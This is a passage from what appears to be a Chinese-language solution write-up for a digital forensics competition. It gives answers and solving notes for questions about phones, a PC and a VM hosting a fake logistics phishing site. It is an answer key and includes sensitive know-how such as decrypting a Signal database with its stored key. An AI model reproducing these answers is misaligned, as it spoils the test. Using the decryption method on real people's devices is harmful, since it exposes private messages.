B. 分享档案内容

C. 错误发出

D. 无法开启

答案：D

根据上一题可以得出答案

[单选题] 承上题，分析王晓琳与上述用户的对话，他们的关系是什么?(1分)

A. 客户

B. 师生

C. 家人

D. 同事

答案：D

根据上述分析可以知道是同事

[单选题] 王晓琳于何时要求上述用户删除一张照片?(1分)

A. 2022-10-06

B. 2022-09-28

C. 2022-09-30

D. 2022-10-03

答案：D

往下看，可以看到相关日期

[单选题] 承上题，该用户向王晓琳提出什么要求以删除这张照片?(1分)

A. 金钱

B. 毒品

C. 性服务

D. 加密货币

答案：A

根据上题可以看得到

[单选题] 王晓琳的手机里有什么电子书籍(Electronic Book) ?(2分)

A. 三国演义

B. 红楼梦

C. 水浒传

D. 西游记

答案：A

手头上没有分析到电子书籍数据的工具，只能自己去看

在应用列表里面可以看到一个标识为iBooks的，为电子书籍软件

根据这个标识去查这个软件的目录，具体数据库可以定位到/User Apps/com.apple.iBooks/Documents/storeFiles，目录下有一个sqlite文件，导出查看，发现标注的句子

百度可以查到是三国演义

[单选题] 王晓琳在这本电子书籍里最后对哪段文字加入了重点标示效果(Highlight)?(2分)

A. 卿有何妙计

B. 宝玉已是三杯过去了

C. 武松那日早饭罢

D. 就除他做个弼马温罢

答案：A

对表中的ZANOTATIONCREATIONDAT字段进行排序，可以发现最后一段话就是A

[多选题] 王晓琳的手机里有一个 MTR Mobile (港)的手机程序(Mobile App)。 检视其数据库(Database) 的数据，王晓琳于2022年10月11日 22:04 时将一行程加入书签(Bookmark)，这段行程的起点及终点站包括?(2分)

A. 尖沙咀

B. 红硒

C. 康城

D. 青衣

E. 沙田

解析：DE

根据题目信息，可以定位到app应用标识

根据app标识，可以定位到文件目录中的app目录，在/User Apps/com.mtr.mtrmobile/Library下发现一个疑似存储数据的db文件，叫E_Touirst.db

打开发现里面已经是收藏的内容了

根据时间戳的转换，2022年10月11日 22:04时左右大概在1665497040，可以定位到最底下的一条数据

[填空题] 王晓琳于2022年10月2日使用她的手机拍摄了多少张的照片?(以阿拉伯数字回答)(1分)

答案：90

筛选得出答案

[单选题] 检视王晓琳的手机照片，她于2022年10月2日到过什么地方?(1分)

A. 大潭郊游径

B. 城门畔塘径

C. 大榄麦理浩径

D. 京士柏卫理径

答案：B

在手机里面可以看到一张关于城门畔塘径的图片

[单选题] 李大辉使用的是一台LG V10的手机，它的型号是什么?(1分)

A. LGH960C

B. LGH961N

C. LGH960H

D. LGH961C

E. LGH961D

答案：B

分析得出的

[单选题] 李大辉的手机最常搜索的类别(Category) 是什么?(1分)

A. 护肤品

B. 旅游

C. 运动

D. 学校

答案：A

看百度APP的浏览器记录就可以看出来了

[填空题] 李大辉最近光顾了一家美丰快运公司，这快递件的单号是什么?(不要输入符号及空白，以阿拉伯数字回答)(1分）

答案：AY806369745

在手机的应用列表里面看到Gmail，定位到Gmail存放数据的位置

/userdata/Root/data/com.google.android.gm/databases，里面有个数据库是存放邮件内容的，叫mailstore.litahui18@gmail.com.db，导出分析

分析数据库，可以看到Message表内有一条数据，是关于邮件的且包含运单号

[单选题] 李大辉收到的电邮中有一个钓鱼链结(Phishing Link)，这个链结的地址是什么?(1分)

A. 以上皆非

B. https://bit.ly/3yeARcO

C. https://bit.ly/5vM12

D. http://bit.ly/Hell0

答案：B

根据上文可得出答案

[单选题] 承上题，这封电邮是从哪个电邮地址寄出的?(1分)

A. 以上皆非

B. Cavinchow456@yahoo.com

C. 2020ChanChan@hotmail.com

D. 30624700Peter@proton.me

答案：D

根据18题可得出答案

[单选题] 承上题，寄出这封电邮的IP地址是?(2分)

A. 以上皆非

B. 65.54.185.39

C. 10.13.105.56

D. 58.152.110.218

答案：A

思路：暂无

[单选题] 李大辉手机有一个order.xlsx 的档案被加密了，解密钥匙是什么?(1分)

A. 2022 Nov!

B. 20221101

C. Nov2022!

D. P@sswOrd!

答案：C

在手机图片就可以看到一张便签，上面写着Excel file pw

[填空题]香港的街道上每一枝街灯都有编号。分析李大辉手机里的程序KMB 1933，哪一枝街灯在经度 Latitude) 22.4160270000，纬度(Longitude) 114.2139450000 附近，它的编号是什么?(以大写英及阿拉伯数字回答)(2分)

答案：CE1453

根据题目信息，定位应用标识

定位到软件数据所在目录：/userdata/Root/data/com.kmb.app1933，发现目录内有一个db

导出分析，发现在kmb_routestopfile_ST表内存在经纬度，过滤后得结果

1

SELECT * FROM "kmb_routestopfile_ST" where lat = '22.4160270000'

[填空题]李大辉的手机里有一张由该手机拍的照片，照片的元资料(Metadata) 曾被修改，这张照片的档案名是什么?(以大写英文及数字回答)(2分)

答案：20220922152622

元资料：应该是文件属性的替代词，当做文件属性即可

发现在本机图片中有一张修改过拍摄日期的图片(2008年不可能拍照这么清楚吧

这里题目说明了以大写英文及数字回答，下划线不需要了

[单选题] 分析李大辉的手机里的资料，他在哪一间公司工作?(2分)

A. 美丽好化妆品公司

B. 步步高贸易公司

C. 盛大国际有限公司

D. 永恒化妆品公司

答案：A

第21题给出过Excel的密码，可以根据这个Excel名字定位，发现这个目录下面还有员工卡(staff card)

导出发现pdf跟xlsx这俩文件格式不匹配(可能是软件的问题，修改一下就可以打开了

[填空题] 林浚熙曾经以手机登录Google账户的验证码是什么?(不要输入符号，以大写英文及阿拉伯数字回答)(1分)

答案：G785186

直接看手机短信就可以找到了

[填空题] 林浚熙手机的 WhatsApp’ 号码是什么?(号码)@s.whatsapp.net? (以阿拉伯数字回答)(1分)

答案：852590308538

看WhatsApp的账号信息就可以看出来了

[单选题] 通过分析林浚熙手机的照片，判断他在何处偷拍王晓琳?(1分)

A. 交通工具

B. 郊野公园

C. 游泳池

D. 酒店房间

答案：

之前看过这张图了，位置类似酒店房间

[填空题] 林浚熙曾经删掉自己拍摄的照片，这张照片的档案名(Filename) 是什么?(不要输入，以大写英文及阿拉伯数字回答。如Cat10.jpg，需回答CAT10JPG)(2分)

答案：IMG0444JPG

使用工具能够直接看到

[填空题] 王晓琳曾经发送一个PDF档案予林浚熙，这个档案的文件签名(File Signature) 是什么?(以十六进制数字答首八位数值，如FOA1C5E1)(2分)

答案：D0CF11E0

查看这俩的聊天记录，只发现一个pdf文档

提取该文件并使用二进制的方式查看，即可知道文件签名

经查，这个是一个Word或Excel文件

修改后缀后只有xls能打开

[填空题] 承上题，该PDF档案内包含一位曾经被骗的受害者资料。分析林浚熙手机的数据，这位受害者的英文名字是什么?(不要输入符号及空白，以大写英文回答)(2分)

答案：WONGSAIPING

筛选文档以及即可得出答案林浚熙手机中的WhatsApp聊天记录，可以发现有一个英文名字是相重复的

[单选题] 分析林浚熙手机上的数据，他在2022年10月17日计划去什么地方?(2分)

A. 以上皆非

B. 荃湾站

C. 沙田站

D. 国际金融中心二期

答案：C

这题在国内比较偏门，如遇此类题目可先跳过，有时间再做

思路：遇见这类题目，如果在取证软件上翻遍了都找不到相关的关键字的话，可以先向手机中的地图软件入手，并且查看其查询历史记录

在应用列表中，发现三个地图APP，分别是Google Map、Apple Map和Waze(国内基本没有见过这个地图软件，所以说比较难找到)

Waze：

先从Google Map开始看起，定位到数据目录：/User Apps/com.google.Maps/，结果没有发现跟db相关的

然后就是找Apple Map的数据，结果与Google Map相同

最后就是看Waze的，定位：/User Apps/com.waze.iphone，在Document文件夹里面发现与db相关的文件

提取user.db分析，发现在EVENT_PLACES表中有一些时间戳和地点

将这两条记录的start_time时间戳转换，发现沙田站为正确答案

[填空题] 承上题，上述行程的结束时间是?(如答案为 16:01:59，需回答 160159)(2分)

答案：124500

将上题条目中的end_time进行时间戳转换即可得到答案

[填空题] 于林浚熙的手机里，在2022年9月1日 或以后，哪一张照片是由其他手机拍摄的，而它的档案名是什么?(不要输入，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG)(2分)

答案：IMG0446HEIC

题目说明了林浚熙的手机是iPhone XR，筛选后只有一张图片是9月1日以后的

[单选题] 根据照片的数据库Photos.sqlite资料，哪一个栏目标题(Column Header) 可以显示这张照片的接收方式?(2分)

A. ZRECEIVEMETHODIDENTIFIER

B. ZIMPORTEDFROMSOURCEIDENTIFIER

C. ZIMPORTEDBYBUNDLEIDENTIFIER

D. ZRECEIVEDFROMIDENTIFIER

答案：C

通过搜索定位数据库文件位置

导出分析，发现一堆库~~~~

利用Navicat的搜索功能，发现只有一个选项查得到数据

[单选题] 承上题，这张照片通过什么方式接收?(2分)

A. 网页下载

B. 蓝牙传送

C. 以上皆非

D. WhatsApp软件传送

E. Signal软件传送

答案：C

根据上题查出来的结果，发现有ZADDITIONALASSETATTRIBUTES和ZGENERICALBUM两个表里面是存了数据，剩下一个表是空的

再看ZGENERICALBUM这个表，发现这个表对应的ZIMPORTEDBYBUNDLEIDENTIFIER字段全为空

最后看ZADDITIONALASSETATTRIBUTES这个表，发现这个字段下面存在数据

找到图片所处时间点：2022-09-03 15:58，发现选项中没有一个对应得到数据的

com.apple.shareingd：家庭共享的方式

所以四个选项均不符合

[填空题] 承上题，这张照片原本的档案名(Original Filename) 是什么？不要输入‘.’，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG)(3分)

答案：IMG0730HEIC

根据上题可以直接查出答案

林浚熙手机里有一个备忘录 (Notes) 被上了锁，这个备忘录的名称是什么? (以大写英文及阿拉伯数字回答) (1分)

答案：HALO

对林浚熙手机全局搜索note

定位到NoteStore.sqlite，并导出分析，在数据库ZICCLOUDSYNCINGOBJECT中发现一些疑似备忘录的数据

查看该表的字段名，发现有个字段名叫ZISPASSWORDPROTECTED，意思就是密码保护的意思，发现有两条数据在该字段下数据为1，即有密码保护

定位到该两条数据，Z-TITLE分别为Halo和今天

使用盘古石分析查看，标题为今天的备忘已经删除

所以答案为HALO，即为未删除的数据

[填空题] 承上题，上述备忘录的内容有一串数字，它是什么?(以阿拉伯数字回答)(2分)

答案：123456

解析：施工中

[单选题] 林浚熙计算机(Computer) 的操作系统(Operating System) 版本是什么?(1分)

A. Windows 10 Pro for Workstations 21H2

B. Windows 10 Pro 22H2

C. Windows 10 Home 21H2

D. Windows 10 Pro for Workstations 21H1

答案：A

仿真进去看

[填空题] 林浚照计算机安装了什么品牌的虚拟专用网络 Virtual Private Network - VPN)软件?(不要输入符号及空白，以大写英文及阿拉伯数字回答)(1分)

答案：EXPRESSVPN

桌面有得看

[填空题] 承上题，分析该虚拟专用网络的日志(Log)，他在哪天安装该虚拟专用网络?(如答案为 2022-12-29，需回答 20221229)(2分)

答案：20220915

分析工具直接出结果

[填空题] 检视林浚照计算机的数据，他使用哪种加密货币(Cryptocurrency) 以支付虚拟专用网络软件?以大写英文回答该加密货币的全名，如 BITCOIN)(1分)

答案：BITCOIN

桌面有个东西好像Electron

百度了才知道，这个就是解密货币的钱包，见识短浅了

在C:\Users\HEI\AppData\Roaming\Electrum\这个目录下面，有三个没后缀的文件，其中有两个分别是配置文件和区块头部（Blockchain-headers）,我们可以看看他最近连了什么服务器

打开recent_servers，可以发现btc的踪影

[填空题] 林浚熙的加密贷钱包(Cryptocurrency Wallet) 名称是什么?不要输入符号，以大写英文及阿拉伯数字回答2分)

答案：TELLAWIEH

根据上一题可以知道Electrum是个加密货币钱包，打开一看就可以看到加密钱包的名称了

[多选题] 林浚熙计算机里安装了哪个浏览器(Web Browser)? (1分)

A.Tor Browser

B.Microsoft Edge

C.Google Chrome

D.Opera

E.Internet Explorer

答案：ABCE

[单选题] 林浚熙使用浏览器 Google Chrome’ 曾经浏览最多的是哪个网站? (1分)

A. https://gmail.com

B. https://mail.google.com/mail

C. https://web.whatsapp.com

D. https://facebook.com

答案：C

可以对上面四个选项进行筛选，并计算访问次数

A：3/1283

B：4/1283

C：116/1283

D：0/1283

[多选题] 除了上述网站,林浚熙曾使用浏览器 Google Chrome 搜索过什么?(1分)

A. javascript教学

B. php sql教学

C. tor教学

D. docker image教学

E. electrum教学

答案：BCDE

只有JavaScript找不到

[单选题] 林浚熙的计算机安装了一个通讯软件Signal，它的用户资讯储存路径是什么?(1分)

A. \Users\HEI\Desktop\Signal

B. \Users\HEI\AppData\Roaming\Signal

C. \Program Files (x86)\Signal

D. \Users\user\Roaming\Signal

答案：B

分析结果看源文件就能看到相关路径了

[填空题] 通讯软件Signal采用一个档案存放用户的聊天记录，它的档案名是什么?(不要输入，以大写英文及阿拉伯数字回答。如Cat10.jpg，需回答CAT10JPG)(2分)

答案：DBSQLITE

上一题的源文件就看到db的文件名了

[填空题] 承上题，对上档案进行分析，林浚熙的联络人当中有多少人安装了Signal?(以阿拉伯数字回答)(3分)

答案：4

联系人中有四条数据

[填空题] 林浚熙在“Signal’ 曾经与某人对话，那人的手机号码是什么? 需要与区码(Area Code) 一同答(以阿拉伯数字3分)

答案：85270711901

对话的那个人叫Rocky

根据上题的分析，可以查到Rocky的手机号码是+85270711901，去掉加号就是答案

[多选题] 承上题，两人在 Signal 的对话中有些讯息(Message) 包含附件，这些讯息的 ID 包括?(2分)

A.5b9650fe-3bb6-4182-9900-f56177003672

B.46a8762b-78ea-49aa-a6f5-b24975ec189f

C.9729bf92-ab9c-45f7-8147-66234296aele

D.47233ffe-1a73-4b3d-b97c-626246ec3129

答案：BC

导出数据库，发现数据库无法打开，考虑数据库经过加密

参考别人的wp，可以在软件根目录找到config.json，里面包含密钥

key前需要添加0x，放到DB Browser (SQL Cipher)解密即可

查messages表可以看到，里面都是聊天记录，里面有两条是包含附件的数据

前面有对应的id，对应选项即可

[填空题]承上题，林浚熙曾经于2022年10月20日转账（Transfer Money) 予上述对话人士,那次转账的参考编号是什么?(以大写英文及阿拉伯数字回答)(3分)

答案：N91088774024

分析软件可以直接看到

[单选题] 林浚照的计算机安装了多少台虚拟机Virtual Machine - VM) ?(以阿拉伯数字回答)(1分)

A.1

B.2

C.3

D.4

答案：A

可以看到只有一台虚拟机

[单选题] 林浚熙的计算机里的虚拟机(VM) 存放在什么路径?(1分)

A.\User\HEI\Roaming\Virtual Machines

B. \Users\Public\Documents\Virtual Machines

C. \Program Files\Virtual Machines

D. \Users\HEI\Documents\Virtual Machines

答案：D

按照上题追踪到的虚拟机，在后面直接有存放路径

[单选题] 虚拟机 (VM) 使用什么版本的作业系统(Operating System) ?(1分)

A. CentOs Linux 7.5.1804 (Core)

B. Ubuntu 22.04.1 LTS

C. CentOS Linux release 7.6.1810(Core)

D. Ubuntu 20.04.5 LTS

答案：D

[多选题] 虚拟机(VM) 中的文件传输服务器(FTP Server) 有哪些用户?(2分)

A. nobody

B. root

C. admin

D. man

E. ftpuser

答案：BE

仿真后打开仿真机内的vm，查询etc下的vsftpd.conf，发现存在一个存放用户的列表

1
2
3
4

# 查看vsftpd配置文件
cat /etc/vsftpd.conf
# 查看vsftpd的用户列表
cat /etc/vsftpd.chroot_list

查询完毕出结果

[多选题] 虚拟机设置了什么网页服务器(Web Server)? (2分)

A. NGINX

B. LIGHTTPD

C. WORDPRESS

D. APACHE

E. IIS

答案：AD

一个一个查看看有没有

IIS就不查了，Windows独占的Web服务器

[单选题] 网页服务器目录内有图片档案，而此档案的储存位置是?(1分)

A. /var/www/html/post/src

B. /var/www/html/post/css

C. /var/www/html/post/vendor

D. /var/www/post

答案：B

ftp连上服务器，按照选项给的相关路径去找，最终找到/var/www/html/post/css里面有图片档案

[单选题] 分析网页服务器的网站数据，假网站的公司名称是什么?(1分)

A. Krick Global Logistics

B. Global Logistics

C. Krick Post Global Logistics

D. Krick Post

答案：C

根据上题找到index.php，发现标题存在类似公司名称

公司标题为KP - Global Logistics，结合选项得出答案

[单选题] 检视假网站首页的显示，AY806369745HK 代表什么?(1分)

A. 邮件号码

B. 邮件收费号码

C. 邮件序号

D. 邮件参考号码

答案：A

根据上题提取的index.php，往下翻就翻到了

[填空题] 分析假网站的资料，当受害人经假网站输入数据后，网站会产生一个档案，它的档案名是什么?(不要输入“，以大写英文及阿拉数字回答。如 Cat10.jpg，需回答CAT10JPG)(2分)

答案：VUTXT

在index.php同级目录下有一个文件叫process.php

里面有一段代码是写入文档的

看到resultFile为vu.txt

[多选题] 分析假网站档案，process.php’ 源码(Source Code),推测此档案的用途可能是?(2分)

A. 改变函数

B. 产生档案

C. 发出邮件

D. 更新数据库

答案：BC

根据上题分析，先推测该文件为产生文件并记录受害者信息，再往下看这个文件，发现还存在关于邮件的代码

再猜测可能会有发送邮件给受害者的功能

[填空题] 检视档案process.php’ 源码, 林浚照的电邮密码是?(以大写英文回答)(1分)

答案：RTATSCEUCPACOCBDACS

上题邮件部分就有密码了

[多选题] 分析档案process.php’ 源码, 它不会收集哪些资料?(2分)

A. GPS位置

B. 信用卡号码

C. 短讯验证码

D. 电话号码

E. 电邮地址

答案：ACD

在61题里面，有收集的信息变量

根据对应的英文单词，结合选项和题目可得出答案

[填空题] 虚拟机 (VM)安装了 Docker 程序，列出一个以5作为开端的 Docker镜像 (Image) ID (以阿拉伯数字及大写英文回答)（2分)

答案：5D58C024174D

用docker images命令就能看到

[填空题] Docker 容器(Container)mysql 对外开放的通讯端口(Port) 是?(3分)

答案：43306

把mysql的容器启动起来

1
2

docker start ca
docker ps -a

启动起来就能看到端口号了

[填空题] Docker容器 mysql，用户 root 的密码是?(以大写英文及阿拉伯数字回答)(2分)

答案：2WSX3EDC

在分析虚拟机镜像时，可以看到其终端记录，里面包含了一条记录，是启动mysql的docker容器的

里面包含了mysql的root密码

[填空题] Docker容器，mysql 里哪一个数据库储存了大量个人资料?(以大写英文回答)(3分)

答案：KRICKPOST

用这个密码登录mysql数据库，可以看到krickpost这个数据库里面的customer表存放着大量个人信息

[填空题]检视 Docker 容器’mysql’ 内数据库里的资料，李大辉的出生日期是?(如答案为 2022-12-29，需答 20221229) (3分)

答案：19850214

结合之前对李大辉手机的分析，可以知道他的邮箱地址为litahui18@gmail.com，利用Email字段进行搜索即可

1

SELECT * FROM `customer` where Email = 'litahui18@gmail.com';

[多选题] 通过取证调查结果进行分析(包括但不限于以上问题及情节)，林浚熙的行为涉及哪一种罪案?(5分)

A.传送儿童色情物品

B.抢劫

C.诈骗

D.勒索金钱

E.购买毒品

答案：CDE

CDE在做题的时候都有体现

C：林浚熙的电脑里面的虚拟机里面的网站源码有包含类似李大辉收到的邮件的内容，可以判断林浚熙涉及诈骗

D：查看林浚熙和王晓琳的WhatsApp聊天记录，可以知道林浚熙偷拍了王晓琳的私密照，并勒索金钱以删除图片

E：分析林浚熙的电脑镜像，可以发现他的Signal聊天记录里面和Rocky的聊天包含“草”的关键字，且1500HKD/10g的价格一看就不像是正常的东西，下面了还说交货地址和日期，所以可以知道林浚熙还涉及购买毒品